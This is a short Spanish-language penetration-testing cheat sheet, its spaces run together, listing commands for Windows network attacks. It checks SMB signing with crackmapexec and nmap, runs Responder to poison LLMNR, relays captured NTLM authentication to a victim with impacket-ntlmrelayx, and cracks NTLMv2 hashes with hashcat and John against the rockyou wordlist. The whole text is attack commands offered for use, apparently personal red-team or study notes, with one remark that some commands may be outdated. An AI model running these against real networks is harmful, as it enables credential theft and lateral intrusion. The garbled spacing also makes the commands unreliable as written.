#Comprobando firmas SMBcrackmapexecsmb10.0.2.6nmap-p445--scriptsmb2-security-mode<IP>-Pn#Ataque con Responder#Editar el archivo de configuración de Responder y desactivar las opciones SMB y HTTP -> /etc/responder/Responder.confsudoresponder-Ieth0-dwimpacket-ntlmrelayx-t<IP_VÍCTIMA>-smb2support#(Actualizar este punto porque parece que los comandos y la ejecución está bastante deprecada)
LLMNR
#Respondersudoresponder-Ieth0-dw#Cracking NTLMv2 con Hashcathashcat-m5600<HASH_FILE>/usr/share/wordlists/rockyou.txt#Alternativa con Johnjohn--wordlist=/usr/share/wordlists/rockyou.txt-rules/usr/share/john/rules/best64.rule<HASH_FILE>